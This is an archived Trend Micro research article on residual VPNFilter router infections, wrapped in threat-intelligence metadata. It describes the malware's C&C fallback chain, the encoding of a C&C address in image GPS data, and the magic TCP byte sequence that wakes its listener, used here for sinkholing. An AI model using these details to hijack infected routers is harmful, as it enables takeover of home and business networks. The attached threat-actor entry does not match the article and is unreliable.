{
	"id": "04ac250d-b67c-43bd-841c-37e426ec48fc",
	"created_at": "2026-04-06T00:18:39.02379Z",
	"updated_at": "2026-04-10T13:11:52.77461Z",
	"deleted_at": null,
	"sha1_hash": "f8b45386326d6e9a08259bb7053b3a53a2ba6cf7",
	"title": "VPNFilter Two Years Later: Routers Still Compromised",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1837787,
	"plain_text": "VPNFilter Two Years Later: Routers Still Compromised\r\nBy By: Stephen Hilt, Fernando Merces Jan 19, 2021 Read time: 12 min (3280 words)\r\nPublished: 2021-01-19 · Archived: 2026-04-02 12:11:47 UTC\r\nIoT\r\nWe look into VPNFilter, an IoT botnet discovered over two years ago, to see why there are still routers infected by\r\nthe malware and what else can be done to minimize its potential risks.\r\nWith the internet of things (IoT)open on a new tab gaining more popularity, common IoT devices such as routers,\r\nprinters, cameras, and network-attached storage (NAS) devices, are becoming more frequent targets for\r\ncybercriminals. Unlike typical operating systems such as Windows and macOS, users are less likely to patch IoT\r\ndevices. This is because users find the task more difficult and inconvenient since, in comparison, the operating\r\nsystems of these devices have no auto-update feature and some manufacturers rarely even issue security updates at\r\nall. These are the kinds of systems that users log on to once in order to set them up and then never to do so again,\r\nunless they encounter a big problem. It also is not rare to find an outdated router — one that has been running for\r\nas long as the system has.\r\nAs a result, many systems are left wide open to known vulnerabilities, which can lead to successful attacks even\r\nyears after the first infection. While looking at these types of infections by known malware families, we found that\r\none of the biggest reported malware families was from 2018’s VPNFilter.\r\nVPNFilter is a malware type that affects routers and storage devices by using backdoor accounts and exploits of\r\nseveral known vendorsopen on a new tab. In May 2018, Cisco Talos released the first reportopen on a new tab on\r\nthe malware, which showed how VPNFilter was designed to gain a foothold into networks and look for Modbus\r\ntraffic. However, it should be noted that this was not the only plug-in but rather merely one of the plug-ins that\r\ncould be deployed. Modbusopen on a new tab is a popular industrial control system (ICS) communication\r\nprotocol that is specific to these types of systems. While the malware tends to focus on compromising consumer-grade IoT devices, it is also true that consumer devices are often found as part of ICS systems for various reasons.\r\nSome reasons include the fact that these devices are easy to deploy, provide remote vendor access, or simply\r\nbecause they are mistakenly added by the administrator. That the malware potentially targets control systems\r\ncould be the reason that the FBI has attributedopen on a new tab the first reported attack to the work of nation-state actors.\r\nVPNFilter operates in multiple stages that include initial infection, command-and-control (C\u0026C) communications,\r\nand the third stage, in which the payloads are deployed. These payloads perform the tasks that the malware has\r\nbeen intended to do. This is also where the Modbus portion of the malware is found. The first stage of the malware\r\ninvolves gaining access to specific devices from over 12 vendors. Once this is done, the second stage of the\r\nmalware involves an attempt to connect to Photobucket, an image-hosting site, to download an image that has the\r\nIP address of the C\u0026C server embedded in the GPS coordinates of the exchangeable image file format, also\r\nhttps://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html\r\nPage 1 of 12\n\nknown as Exif. If this fails, then it will try to reach out to the domain toknowall[.]com to download an image with\r\nthe C\u0026C server also embedded in the file. Finally, if both these two attempts fail, it will open a listener to monitor\r\nall incoming packets for a specially crafted TCP packet that would contain the IP address of the C\u0026C server.\r\nFigure 1. VPNFilter’s operation and stages based on Cisco Talos’ report\r\nWhile VPNFilter gained considerable attention and became a threat when it was first discovered, this happened\r\nback in 2018. This means that several mitigation tactics have already been used to render VPNFilter essentially\r\noffline. With domain seizures and every action taken to stop the malware, therefore, it is worth asking why there\r\nare still infections out there. The FBI’s statement at the time of the malware’s discovery advised users to restart\r\npotentially affected devices to temporarily disrupt the malware. The statement also meant that by restarting the\r\nrouter users would essentially remove any current first-stage and third-stage malware based on the initial findings\r\nfrom Cisco Talos. However, this leaves leftover infections, which is the original listener setup by the first-stage\r\nmalware.\r\nIn our recent paper titled “Worm War: The Botnet Battle for IoT Territorynews article,” we covered the aspect of\r\nbotnets removing the infections of other botnets and the ease with which these IoT devices can be compromised.\r\nAt times, it seems that threat actors are the few people who have access to some of these systems and are the ones\r\nremoving malware types like VPNFilter. It’s worth noting that this kind of access might not be available to all\r\nusers in the first place. As an example, when the FBI took down part of the botnet’s network infrastructure, they\r\nrecommended end users to restart their devices. However, many users have routers that were provided by their\r\nISP. Often, this type of end users would therefore not have login access to the router. As a result, without their\r\nISP’s permission, they cannot update the firmware to get the latest vulnerability fixes. As we will discuss here, this\r\nis precisely the reason that the FBI worked with Shadowserver to add the extra safeguard of sinkholing the botnet.\r\nStill, we did find examples where vendors published updates and guidance to remediate the infection.\r\nNetgearopen on a new tab and MikroTik, for instance, have stated that upgrading the firmware would remediate\r\nthe malware’s effects and prevent further infections.\r\nhttps://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html\r\nPage 2 of 12\n\nAs of writing, however, we have not encountered any one organization in the IoT space that has committed to\r\nclean up vulnerabilities and infections. Due to the lack of a standard group or mechanism for updates, the owners\r\nof these IoT devices often need to manually go to their vendor’s website, download a firmware file, then upload it\r\nto the device. Very few seem to have automatic firmware update procedures in place. These observations have\r\nspurred us to ask the following questions with regard to the remaining VPNFIlter infections:\r\n    How many victims have updated their router’s firmware?\r\n    How many victims have had their infected routers replaced in the last two years?\r\n    Was VPNFilter one of the infections that was being removed by other malware actors?\r\n    Are there any infected devices still out there?\r\nShadowserver Sinkhole\r\nThe Shadowserver Foundation is a nonprofit security organization whose mission is to “... make the Internet more\r\nsecure by bringing to light vulnerabilities, malicious activity and emerging threats.\" Recently, Trend Micro has\r\npartnered with Shadowserver to provide funding for their cause over the next three years. Given this partnership\r\nand the work that Cisco Talos, the FBI, and the US Department of Justice (with the support of Shadowserver) had\r\nalready done in the past to sinkholenews article VPNFilter’s second domain (toknowall[.]com), we wanted to\r\nwork with Shadowserver to collect data from any available stats that they might have, such as how many\r\ninfections are still out there. We also wanted to suggest ways to clean up any leftover VPNFilter infections. This is\r\nof particular importance, as cleaning these devices is far from trivial for end users. This is precisely the reason that\r\nit was so important for these organizations to carry out the sinkhole in the first place.\r\nFirst, we needed to get a better understanding of the malware, find out how it worked, and from there determine if\r\nanything else could be added to the takedown processes that were already being done. \r\nFigure 2. The number of requests since the sinkhole of toknowall[.]com started, as provided by\r\nShadowserver\r\nAs shown in the image above, when Shadowserver started the sinkhole, they saw an initial spike of over 14,000\r\nnetworks infected in the first two months; over time, that has been reduced to 5,447. This shows that even after\r\nover two years, there is still a sizeable number of infections left. Most notably, at this rate, the infections will\r\nlikely still be around for years to come, until perhaps these devices are physically swapped out — a common trend\r\nin IoT botnetsopen on a new tab. Not only does this tie to our main point that IoT botnets are to some degree\r\nnearly “uncleanable,” it also makes VPNFilter a botnet that is ripe for taking over by another threat actor for them\r\nto utilize, as we will explain later on.\r\nhttps://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html\r\nPage 3 of 12\n\nFigure 3. Breakdown of the remaining infections by country\r\nTechnical details\r\nAs stated in the original publication by Cisco Talos, the first stage seeks to download the second-stage malware\r\nfrom an IP address received using the following scheme:\r\n1. Get the second-stage malware from an image file uploaded to Photobucket[.]com.\r\n2. If the above fails, it tries to download the image from the domain toknowall[.]com.\r\n3. If both fail, it starts listening to all TCP packets on the affected device to receive the IP address from a\r\nspecific TCP packet sent by the attacker.\r\nThis logic is presented in Figure 4.\r\nhttps://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html\r\nPage 4 of 12\n\nFigure 4. The order of VPNFilter’s first stage to get the second stage server\r\nWe wanted to verify the effectivity of the solutions against the first and second phases of the first stage. Mainly,\r\nthis means that to see the effectivity of the sinkhole, it is necessary to check for victims that are still infected. In\r\ncase there are still infected victims, it is necessary to try to think of a solution to permanently clean up these\r\ndevices.\r\nOne key thing that we discovered from the outset was that even though the first phase (the image in Photobucket)\r\nwas already taken down and the second phase (alternative domain) sinkholed, unless the malware receives a valid\r\nImage file from the sinkhole, it would still enter its third phase where attackers could potentially regain control.\r\nIronically, while this might seem like bad news, this showed us an opening for a solution, as we will discuss later\r\non. Here we detail our findings on the first and second phases for this initial stage.\r\nPhotobucket[.]com C\u0026C\r\nAll the URLs pointing to Photobucket[.]com were already taken down, which means that the pictures hosted there\r\nwere also removed. Therefore, the only two possible options for currently infected devices would be to reach out\r\nto toknowall[.]com or to start listening to TCP packets while expecting a specially crafted packet containing the IP\r\naddress of the second stage server. For our next step, we verified how many real victim devices were left\r\ncommunicating with the sinkhole and how many of these had already moved to listening mode.\r\ntoknowall[.]com C\u0026C\r\nWe then verified if it would be possible to inject our own image with a C\u0026C IP address controlled by us, to see\r\nhow many hosts would respond. For this, we had to dig deeper in the malware logic to extract the C\u0026C IP address\r\nhttps://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html\r\nPage 5 of 12\n\nfrom the image downloaded from either Photobucket[.]com or toknowall[.]com. The algorithm calculates each of\r\nthe four octets of an IPv4 address out of the GPS information contained in the Exif header of the downloaded\r\nimage file. The two values used are GPSLatitude and GPSLongitude. Each of these consists of three values\r\n(degrees, minutes, and seconds) stored as rationals (64-bit numbers split into two 32-bit integers). The first 32-bit\r\nnumber is called a numerator and the second is called a denominator. The theory behind this is better explained\r\nSoufiane Tahiri’s book, “Mastering Mobile Forensics.” In the case of VPNFilter, these coordinates are used like\r\nthis:\r\nFigure 5. How the IPv4 address of the second stage C\u0026C is formed based on the GPS coordinates\r\nof an image file\r\nAs can be seen from Figure 5, the denominator part of all coordinates is ignored by the malware. The numerator,\r\nhowever, is used to generate the values of all octets.\r\nWe wrote a program to replace these bytes in the image that we created. The code that does the job can be seen in\r\nFigure 6.\r\nhttps://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html\r\nPage 6 of 12\n\nFigure 6. The source code for our program to write at a specific position of an image file\r\nIn the preceding code, the first coordinate is located at position 4500 (decimal) in the image. We could have\r\nparsed the whole Exif header, but we needed something quicker. Also, in lines 48 and 51, we set the numerator\r\npart of the degree value for both latitude and longitude to zero so that we could leverage the negative integer\r\nvalues in C to write the exact bytes that we needed.\r\nBy using our program, we were able to inject an IP address that points back to the sinkhole owned by\r\nShadowserver to see how many infected devices are still actively looking for a second stage download server and\r\nmore importantly, to prevent the still-infected networks from moving to stage one’s third phase (listening to all\r\nTCP packets) in the future. \r\nhttps://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html\r\nPage 7 of 12\n\nFigure 7. The image developed containing the C\u0026C that we controlled.\r\nFigure 7 shows the resulting image that we used. This image was then supplied to Shadowserver who are in the\r\nprocess of deploying it. While this is being done, we went to look for victims in a specific stage of the infection.\r\nListening mode\r\nIf the malware does not get a valid image from previous stages, it will then enter into listening mode. This allows\r\nthe attackers to regain control over infected victims if the sinkholed alternative domain does not serve a valid\r\nimage.\r\nFigure 8 shows the source code that makes this third option possible.\r\nhttps://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html\r\nPage 8 of 12\n\nFigure 8. VPNFilter’s listener from the first stage of the malware\r\nThe above code lets the malware listen to all packets and expects one TCP packet with the SYN flag that is at least\r\n8-bytes long. The magic sequence expected is a hexadecimal 0C 15 22 2b.\r\nFigure 9. A magic byte sequence in hexadecimal.\r\nAfter verifying the logic, our next step was to generate the packet. The easiest way that we could think of doing\r\nthis was to use hping3 since this tool is capable of sending any type of network packet. We used the code seen in\r\nFigure 10.\r\nhttps://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html\r\nPage 9 of 12\n\nFigure 10. A Bash script that sends a specially crafted packet to a host\r\nWe then asked Shadowserver to scan the infected devices that they have logged throughout the years to see how\r\nmany would respond. Here are the results for the unique 5,447 devices that were found still connecting to the\r\nsinkhole on a single day. It is important to remember that because these are routers and other similar types of\r\ndevices, this number also represents thousands of infected networks, not simply individual machines. This means\r\nthat the reach and visibility for attackers with a botnet like this can be substantial. Also, the number of infected\r\nhosts might be higher than what Shadowserver sees on their sinkhole, as the domain toknowall[.]com is a well-known C\u0026C and can be blocked at the DNS level by DNS providers or other security products.\r\nHere we summarize our main findings and show the geolocation data.\r\n1,801 (33.1%) networks responded to our packet sent by hping3 on TCP port 80.\r\n363 (6.7%) networks reached back to our sinkhole on port TCP 443.\r\nInfections seem to be led by USA, followed by Russia, according to geolocation data from the hosts that reached\r\nback to our sinkholed server.\r\nhttps://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html\r\nPage 10 of 12\n\nFigure 11. Hosts that parsed the packet and reached out to our sinkholed C\u0026C.\r\nAlthough only 363 networks connected back to our sinkhole, we cannot assume that the 1,801 networks that gave\r\nus an initial positive response are clean. They might still be infected by VPNFilter, but the connection to our\r\nsinkhole could have been blocked if they are behind a firewall. These 363 networks can be taken over by anyone\r\nwith an understanding of how the malware works. From a technical perspective, there was nothing to prevent the\r\ntakeover of these devices. Additionally, at any point in time the original actors could take control of the devices\r\nthat are already infected.\r\nConclusion and recommendations\r\nEven though solutions have been deployed to lower the effectivity of VPNFilter (which has been known for over\r\ntwo years), for end users restarting is still not enough to protect their devices from reinfection. To reiterate, this is\r\nwhy the initial sinkhole was so important. While it's not likely to have the malicious actor still on infected\r\nsystems, the malware can still have a potential negative impact. With just a bit of understanding, another malicious\r\nactor can have the botnet reactivated. This is exactly why we worked with Shadowserver to upgrade the second\r\nstage sinkhole with a valid image to prevent the malware from moving forward to its listening mode, which occurs\r\nin the third phase of the first stage.\r\nA firmware update would also remediate this problem. However, as mentioned earlier, firmware updates become\r\nproblematic and in most cases, are not as easy as in PC ecosystems. The major hurdles involve verifying that the\r\nfirmware file is legitimate and understanding how to apply the updates to the system. This would be assuming,\r\nhowever, that users even have access to the router to perform upgrades in the first place, as well as that their\r\nhttps://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html\r\nPage 11 of 12\n\ndevice’s vendor has an upgrade available for their model. In many cases, someone else was responsible for setting\r\nup the device for the user, such as the company that they bought it from, or their ISP. To compound all of this,\r\ngetting a new router might also be problematic if users don’t own the router, so they might have to wait for their\r\nISP to provide a new router.\r\nThese limitations and challenges that are faced by the users on their side bring us to where we are and why the\r\nnumbers of VPNFilter infections are still at the levels that are being seen on the internet. Moving forward, the\r\napproach would be to keep the sinkhole running with the fixes that we have implemented. This limits the ability of\r\nthis specific malware to become active again. It also gives time for devices to naturally go offline with a normal\r\nlife span. The need for such an approach emphasizes the importance for the existence and operations of\r\norganizations like Shadowserver, as they serve as custodians of the internet. This is precisely why Trend Micro\r\nmade the commitment earlier this year to support Shadowserver.\r\nOrdinary end users can also do their part in making sure that the IoT remains safe from the hands of\r\ncybercriminals thereby preventing the success of their future campaigns. One of the best ways to minimize\r\npotential infection from IoT-malware is to limit the number of exposures one has to the internet. This means, in\r\nmost cases, disabling any remote management options in the configuration. Also, disabling Universal Plug-and-Play (UPnP) if the option is available, as this setting might expose services to the internet without the awareness\r\nof their users. Updating devices as regularly as needed to the latest firmware also provides the latest security\r\nfeatures and bug fixes that might be used in attacks against systems.\r\nApplying general security practicesopen on a new tab can also minimize the chances of IoT-malware infecting\r\nrouters and other devices. At present, given the prolonged work-from-home (WFH) setups, users should\r\nreexamine their current security measuresopen on a new tab as home devices and systems now have a heavier\r\ninfluence on corporate networks.\r\nIn our paper “Worm War: The Botnet Battle for IoT Territory,” we show how these devices are both actively\r\nattacked and are relatively simple to compromise. We would now like to extend our messaging to say that these\r\nrouter infections are never cleaned and can be active even years after a botnet has supposedly been offline.\r\nAlthough we have used VPNFilter to elaborate, it’s important to emphasize that this is true of any other IoT\r\nbotnet. Indeed, this will keep happening unless users take care of their router frequently and router manufacturers\r\nstart adding auto-update features to their devices’ operating systems. In the meantime, the security industry faces\r\nan uphill battle against infections that cease to be a threat only when the router is finally replaced.\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html\r\nhttps://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html"
	],
	"report_names": [
		"vpnfilter-two-years-later-routers-still-compromised-.html"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434719,
	"ts_updated_at": 1775826712,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f8b45386326d6e9a08259bb7053b3a53a2ba6cf7.pdf",
		"text": "https://archive.orkl.eu/f8b45386326d6e9a08259bb7053b3a53a2ba6cf7.txt",
		"img": "https://archive.orkl.eu/f8b45386326d6e9a08259bb7053b3a53a2ba6cf7.jpg"
	}
}